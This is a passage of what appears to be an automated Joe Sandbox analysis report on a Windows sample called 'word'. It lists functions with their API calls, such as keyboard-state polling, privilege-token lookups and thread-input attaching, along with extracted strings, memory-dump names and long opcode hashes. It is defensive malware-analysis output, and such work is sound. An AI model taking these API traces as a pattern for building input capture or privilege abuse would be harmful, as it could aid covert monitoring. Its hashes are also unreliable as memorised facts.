                                                                            Strings
                                                                            • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                            • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                            • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                            • API String ID: 1446985595-805462909
                                                                            • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                            • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                            • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                            • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                            Function 00448602 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 105windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$X+
                                                                            • API String ID: 176399719-479754480
                                                                            • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                            • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                            • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                            • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                            Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                            • API String ID: 2907320926-41864084
                                                                            • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                            • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                            • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                            • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                            Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046735D
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004673ED
                                                                            • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00467559
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824,?,?,?,?,?), ref: 004675E4
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 1932665248-0
                                                                            • Opcode ID: 540ab9611df07496c965c6f5b012998b0ae5b601d672a50a0582804279fda95d
                                                                            • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                            • Opcode Fuzzy Hash: 540ab9611df07496c965c6f5b012998b0ae5b601d672a50a0582804279fda95d
                                                                            • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                            Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00444D8A
                                                                            • GetAsyncKeyState.USER32 ref: 00444E0F
                                                                            • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                            • GetAsyncKeyState.USER32 ref: 00444E40
                                                                            • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                            • GetAsyncKeyState.USER32 ref: 00444E69
                                                                            • GetKeyState.USER32(00000011), ref: 00444E77
                                                                            • GetAsyncKeyState.USER32 ref: 00444E8F
                                                                            • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                            • GetAsyncKeyState.USER32 ref: 00444EB5
                                                                            • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                            • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                            • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                            • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                            Function 00474335 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 308COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HH
                                                                            • API String ID: 0-2761332787
                                                                            • Opcode ID: 9f3a2665df019714f0744ddd647493bec623add609b0b214ee0a4c07b146d389
                                                                            • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                            • Opcode Fuzzy Hash: 9f3a2665df019714f0744ddd647493bec623add609b0b214ee0a4c07b146d389
                                                                            • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                            Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004508FC
                                                                            • _wcslen.LIBCMT ref: 00450944
                                                                            • _wcscat.LIBCMT ref: 00450955
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                                            • String ID: -----$SysListView32
                                                                            • API String ID: 4008455318-3975388722
                                                                            • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                            • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                            • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                            • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                            Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                            • GetDlgCtrlID.USER32 ref: 00469289
                                                                            • GetParent.USER32 ref: 004692A4
                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                            • GetDlgCtrlID.USER32 ref: 004692AE
                                                                            • GetParent.USER32 ref: 004692C7
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2040099840-1403004172
                                                                            • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                            • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                            • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                            • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                            Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                            • GetDlgCtrlID.USER32 ref: 00469483
                                                                            • GetParent.USER32 ref: 0046949E
                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                            • GetDlgCtrlID.USER32 ref: 004694A8
                                                                            • GetParent.USER32 ref: 004694C1
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 2040099840-1403004172
                                                                            • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                            • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                            • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                            • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                            Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3413494760-0
                                                                            • Opcode ID: 3e576700eaa120b4cc2728f51a198fd447c15b227df8d5eef1ac6b7d3da7ef95
                                                                            • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                            • Opcode Fuzzy Hash: 3e576700eaa120b4cc2728f51a198fd447c15b227df8d5eef1ac6b7d3da7ef95
                                                                            • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                            Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32(?,?,?,?,0045FDE0,?,?,00000001), ref: 004377D7
                                                                            • GetForegroundWindow.USER32 ref: 004377EB
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437809
                                                                            • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043782E
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043783D
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0043788D
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378A1
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004378AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                            • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                            • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                            • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                            Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll
                                                                            • String ID: 0%d$DOWN$OFF
                                                                            • API String ID: 3832890014-468733193
                                                                            • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                            • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                            • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                            • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                            Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                            • VariantClear.OLEAUT32 ref: 0045E970
                                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                            • __swprintf.LIBCMT ref: 0045EB1F
                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                            Strings
                                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 43541914-1568723262
                                                                            • Opcode ID: babf121c1f21bd7c9f5b22c45122f4cf13babb3f4a346428986e0a82870c9096
                                                                            • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                            • Opcode Fuzzy Hash: babf121c1f21bd7c9f5b22c45122f4cf13babb3f4a346428986e0a82870c9096
                                                                            • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                            Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                            • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DecrementInterlocked$Sleep
                                                                            • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                            • API String ID: 2250217261-3412429629
                                                                            • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                            • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                            • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                            • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                            Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 0-1603158881
                                                                            • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                            • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                            • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
